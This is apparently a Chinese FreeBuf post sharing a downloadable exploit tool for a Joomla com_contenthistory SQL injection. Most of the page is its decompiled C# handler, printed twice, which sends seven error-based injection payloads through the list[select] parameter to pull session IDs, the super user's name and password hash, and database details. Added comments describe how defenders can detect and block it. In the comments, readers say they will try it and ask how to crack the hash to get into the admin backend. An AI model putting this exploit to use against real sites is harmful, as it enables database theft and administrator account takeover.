文中提及的部分技术、工具可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用!
Joomla是一套获得过多个奖项的内容管理系统(Content Management System,CMS),它采用PHP+MySQL数据库开发,可以运行在Linux、Windows、Mac OS X、Solaris等多种平台上。除了具有新闻/文章管理、文档/图片管理、网站布局设置、模板/主题管理等一些基本功能外,还可以通过其提供的上千个插件进行功能扩展。同时它还支持多种语言,由于它的功能非常强大,语言支持强,因此在全世界范围内都有很广泛的应用。
漏洞技术分析:http://www.freebuf.com/articles/82811.html
百度网盘 密码:htmo
*本文作者:菊花,来源:heresec,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)
FreeBuf-is-s-b:果然是这个样子。。
稳定的exploit可不是这个样子写的哦
/// <summary>
/// Decompiled WinForms handler: takes a Joomla base URL from textBox1, sends seven crafted
/// requests to index.php?option=com_contenthistory through this.sendPost, scrapes each
/// response with a regex and writes the captured text into textBox3, 2, 4, 5, 6, 7 and 8.
/// Every request URL is built by plain string concatenation; requests 2-4 additionally
/// splice in the value scraped from request 1 without any validation.
/// </summary>
/// <remarks>
/// Defender's reading: the injection surface is the list[select] query parameter (see the
/// FreeBuf analysis linked above) and the data comes back inside the MySQL
/// "Duplicate entry ... for key" error text, i.e. an error-based leak. Requests to
/// option=com_contenthistory whose list[select] carries a subquery, information_schema or
/// floor(rand(0)*2) are the log/WAF signal; patching Joomla and not returning raw database
/// errors to the client both stop this tool. sendPost and the form class that owns the
/// text boxes are not part of this listing (the name suggests an HTTP helper returning the
/// response body as a string - not verifiable here).
/// </remarks>
public void run()
{
// Delimiters of the leaked MySQL error; each regex below captures the text between them.
string text = "Duplicate entry '";
string text2 = "' for key";
// Target base URL exactly as typed into the UI: no scheme, trailing-slash or shape check.
string text3 = this.textBox1.Text;
// Request 1 uses a hard-coded "jml_" table prefix. Its response is only used to read the
// real prefix back out of a "FROM `<prefix>_ucm_history`" fragment (presumably an echoed
// query inside an error page - the response format is not shown in this listing).
string data = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select concat(session_id)) from jml_session limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)";
// Lookbehind / lookahead delimiters for the prefix scrape.
string text4 = "FROM `";
string text5 = "_ucm_history`";
// Lazy match between the two delimiters. Inside a character class the '.' is a literal, and
// \s\S together already match any character, so both RegexOptions flags are redundant here.
Regex regex = new Regex(string.Concat(new string[]
{
"(?<=(",
text4,
"))[.\\s\\S]*?(?=(",
text5,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
// Match.Value is "" when nothing matches, so a failed scrape is never reported: the empty
// prefix is shown in textBox3 and silently spliced into requests 2-4 below.
string value = regex.Match(this.sendPost(data)).Value;
this.textBox3.Text = value;
// Request 2: first session_id from <prefix>_session, read out of the duplicate-entry error.
string data2 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select concat(session_id)) from " + value + "_session limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)";
// "Duplicate entry ... for key" delimiter regex; rebuilt identically for every request below.
Regex regex2 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value2 = regex2.Match(this.sendPost(data2)).Value;
this.textBox2.Text = value2;
// Request 3: username of the <prefix>_users row whose name is 'super user'.
string data3 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select concat(username)) from " + value + "_users where name='super user' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)";
// Same delimiter regex as regex2 (not reused).
Regex regex3 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value3 = regex3.Match(this.sendPost(data3)).Value;
this.textBox4.Text = value3;
// Request 4: stored password hash of that same row.
string data4 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select concat(password)) from " + value + "_users where name='super user' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)";
// Same delimiter regex as regex2 (not reused).
Regex regex4 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value4 = regex4.Match(this.sendPost(data4)).Value;
this.textBox5.Text = value4;
// Request 5: database() - current schema name. Does not depend on the scraped prefix.
string data5 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select database())),floor(rand(0)*2))x from information_schema.tables group by x)a)";
// Same delimiter regex as regex2 (not reused).
Regex regex5 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value5 = regex5.Match(this.sendPost(data5)).Value;
this.textBox6.Text = value5;
// Request 6: user() - the database account the web application connects as.
string data6 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select user())),floor(rand(0)*2))x from information_schema.tables group by x)a)";
// Same delimiter regex as regex2 (not reused).
Regex regex6 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value6 = regex6.Match(this.sendPost(data6)).Value;
this.textBox7.Text = value6;
// Request 7: version() - the MySQL server version string.
string data7 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select version())),floor(rand(0)*2))x from information_schema.tables group by x)a)";
// Same delimiter regex as regex2 (not reused).
Regex regex7 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value7 = regex7.Match(this.sendPost(data7)).Value;
this.textBox8.Text = value7;
}
已有 11 条评论
感谢分享 晚上试试
搞笑。
这真的是fb?
运行了都是啥不是有效的win32程序
是解码,还是构造reset呢?
扑哧,我来试试,看截图,明显少了某重要的参数
果然是这个样子。。
稳定的exploit可不是这个样子写的哦
/// <summary>
/// Repost (inside the comment thread) of the decompiled run() handler shown earlier on this
/// page: reads a Joomla base URL from textBox1, sends seven crafted requests to
/// index.php?option=com_contenthistory via this.sendPost, scrapes each response with a regex
/// and writes the result into textBox3, 2, 4, 5, 6, 7 and 8.
/// </summary>
/// <remarks>
/// This copy differs from the earlier listing only in its quote characters: the ASCII
/// apostrophes in the two error delimiters and in the two "name=..." filters have become
/// typographic quotes (U+2018/U+2019), presumably a comment-renderer artifact. Defender's
/// reading is unchanged: the list[select] parameter is the injection surface (see the
/// FreeBuf analysis linked above), results travel back inside the MySQL
/// "Duplicate entry ... for key" error text, and requests to option=com_contenthistory whose
/// list[select] contains a subquery, information_schema or floor(rand(0)*2) are the
/// log/WAF signal. sendPost and the owning form class are not in this listing.
/// </remarks>
public void run()
{
// Error-text delimiters (typographic quotes in this copy, see remarks).
string text = "Duplicate entry ‘";
string text2 = "’ for key";
// Target base URL exactly as typed into the UI; not validated.
string text3 = this.textBox1.Text;
// Request 1 with a hard-coded "jml_" prefix; only used to scrape the real prefix from a
// "FROM `<prefix>_ucm_history`" fragment in the response.
string data = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select concat(session_id)) from jml_session limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)";
// Lookbehind / lookahead delimiters for the prefix scrape.
string text4 = "FROM `";
string text5 = "_ucm_history`";
// Lazy match between the delimiters; [.\s\S] already matches any character, so the two
// RegexOptions flags have no effect on this pattern.
Regex regex = new Regex(string.Concat(new string[]
{
"(?<=(",
text4,
"))[.\\s\\S]*?(?=(",
text5,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
// Match.Value is "" on no match: an empty prefix is displayed and spliced into requests 2-4.
string value = regex.Match(this.sendPost(data)).Value;
this.textBox3.Text = value;
// Request 2: first session_id from <prefix>_session.
string data2 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select concat(session_id)) from " + value + "_session limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)";
// Delimiter regex for the duplicate-entry error; rebuilt identically for every request below.
Regex regex2 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value2 = regex2.Match(this.sendPost(data2)).Value;
this.textBox2.Text = value2;
// Request 3: username of the <prefix>_users row filtered by name (typographic quotes here).
string data3 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select concat(username)) from " + value + "_users where name=’super user’ limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)";
// Same delimiter regex as regex2 (not reused).
Regex regex3 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value3 = regex3.Match(this.sendPost(data3)).Value;
this.textBox4.Text = value3;
// Request 4: stored password hash of that same row.
string data4 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select concat(password)) from " + value + "_users where name=’super user’ limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)";
// Same delimiter regex as regex2 (not reused).
Regex regex4 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value4 = regex4.Match(this.sendPost(data4)).Value;
this.textBox5.Text = value4;
// Request 5: database() - current schema name; independent of the scraped prefix.
string data5 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select database())),floor(rand(0)*2))x from information_schema.tables group by x)a)";
// Same delimiter regex as regex2 (not reused).
Regex regex5 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value5 = regex5.Match(this.sendPost(data5)).Value;
this.textBox6.Text = value5;
// Request 6: user() - the database account the web application connects as.
string data6 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select user())),floor(rand(0)*2))x from information_schema.tables group by x)a)";
// Same delimiter regex as regex2 (not reused).
Regex regex6 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value6 = regex6.Match(this.sendPost(data6)).Value;
this.textBox7.Text = value6;
// Request 7: version() - the MySQL server version string.
string data7 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select version())),floor(rand(0)*2))x from information_schema.tables group by x)a)";
// Same delimiter regex as regex2 (not reused).
Regex regex7 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value7 = regex7.Match(this.sendPost(data7)).Value;
this.textBox8.Text = value7;
}
sqlmap构造构造就行了
然而并不能解密hash,求大神教我如何登陆后台
没有hash,有JB用
下载下来试试看先